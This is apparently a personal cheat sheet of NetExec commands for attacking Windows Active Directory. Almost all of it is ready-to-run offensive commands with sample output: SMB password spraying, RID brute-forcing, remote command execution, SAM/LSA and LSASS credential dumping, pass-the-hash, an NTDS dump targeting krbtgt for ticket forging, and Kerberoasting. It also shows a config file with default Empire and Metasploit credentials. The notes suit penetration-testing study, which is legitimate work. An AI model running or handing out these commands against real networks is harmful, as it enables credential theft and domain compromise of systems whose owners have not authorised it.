NetExec-overview-AD
My notes for the Netexec tool
Enumeration:
1
nxc smb -h
1
2
nxc smb <URL>
SMB <URL> 445 DC-DC [*] Windows 10.0 Build 20348 x64 (name: DC-DC) (domain: dc.local) (signing: True) (SMBv1:False)
Name: PC’s name
domain: domain’s name
SMBv1:True (Possible Eternal Blue exploit)
Check for acounts:
1
2
3
4
nxc smb <URL> -u 'guest' -p ''
SMB <URL> 445 DC-DC [*] Windows 10.0 Build 20348 x64 (name: DC-DC) (domain: dc.local) (signing: True) (SMBv1:False)
SMB <URL> 445 DC-DC [-] dc.local\guest: STATUS_ACCOUNT_DISABLED
With a file:
1
nxc smb <URL> -u 'usern.name' -p 'password_file.txt'
1
2
3
4
5
SMB <URL> 445 DC-DC [*] Windows 10.0 Build 20348 x64 (name: DC-DC) (domain: dc. local) (signing:True) (SMBv1:False)
SMB <URL> 445 DC-DC [-] dc.local\name.surname:password STATUS_LOGON_FAILURE
SMB <URL> 445 DC-DC [-] dc.local\name.surname:Password123 STATUS_LOGON_FAILURE
SMB <URL> 445 DC-DC [-] dc.local\name.surname:Summer2023! STATUS_LOGON_FAILURE
SMB <URL> 445 DC-DC [+] dc. local\name.surname:SeekTheCheapestRoute!
Pass the password:
1
nxc smb <URL> -u 'user_file.txt' -p '<found_password>'
With credentials: (enumerate users and groups)
1
nxc smb <URL> -u 'user.name' -p 'found_password' --rid-brute
With--log you can log a specific command to a specific file
config file:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
/home/kali/.nxc/nxc.conf
[nxc]
workspace = default
last_used_db = smb
pwn3d_label = Pwn3d!
audit_mode =
reveal_chars_of_pwd = 0
log_mode = False <--- if True generates log in the "/home/kali/.nxc/logs" folder
ignore_opsec = True
host_info_colors = ["green", "red", "yellow", "cyan"]
[BloodHound]
bh_enabled = False
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = neo4j
bh_pass = neo4j
[Empire]
api_host = 127.0.0.1
api_port = 1337
username = empireadmin
password = password123
[Metasploit]
rpc_host = 127.0.0.1
rpc_port = 55552
password = abc123
Kerberos Auth:
1
nxc smb <URL> -u 'user.name' -p 'found_password' -k
If you have a tgt ticket:
1
2
export KRB5CCNAME=ticket.ccache
nxc smb <URL> -u 'user.name' -p 'found_password' --use-kcache
Execute commands:
1
2
3
nxc smb <URL> -u 'user.name' -p 'found_password' -x 'command' <--- cmd
nxc smb <URL> -u 'user.name' -p 'found_password' -X 'command' <--- Powershell
nxc smb <URL> -u 'user.name' -p 'found_password' -x 'powershell.exe -c "GCI C:\\"' <--- Powershell without obfuscation
If you got admin the first thing to do is dump the sam/lsa:
1
nxc smb <URL> -u 'Administrator' -p 'admin_pass' --sam
1
nxc smb <URL> -u 'Administrator' -p 'admin_pass' --lsa
Auth with Hash:
1
nxc smb <URL> -u 'USER-DC$' -H <hash>
PC name needed.
ntds dump:
1
nxc smb <URL> -u 'USER-DC$' -H <hash> --ntds
ntds dump of a single user: (better krbtgt)
1
nxc smb <URL> -u 'USER-DC$' -H <hash> --ntds --user krbtgt
With the hash of the krbtgt we can forge our own tickets.
Modules:
1
nxc smb <URL> -u 'Administrator' -p 'admin_pass' -M nanodump
Get lsass dump and parse the result with pypykatz
1
nxc smb <URL> -u 'Administrator' -p 'admin_pass' -M lsassy
Dumps lsass and parse the result remotely with lsassy
Put files in the smb share:
1
nxc smb <URL> -u 'Administrator' -p 'admin_pass' --put-file file.txt '\\file.txt'
LDAP
1
nxc ldap -L <--list modules
Kerberoast:
1
nxc ldap <URL> -u 'Administrator' -p 'admin_pass' --kerberoasting outfile.txt
This post is licensed under CC BY 4.0 by the author.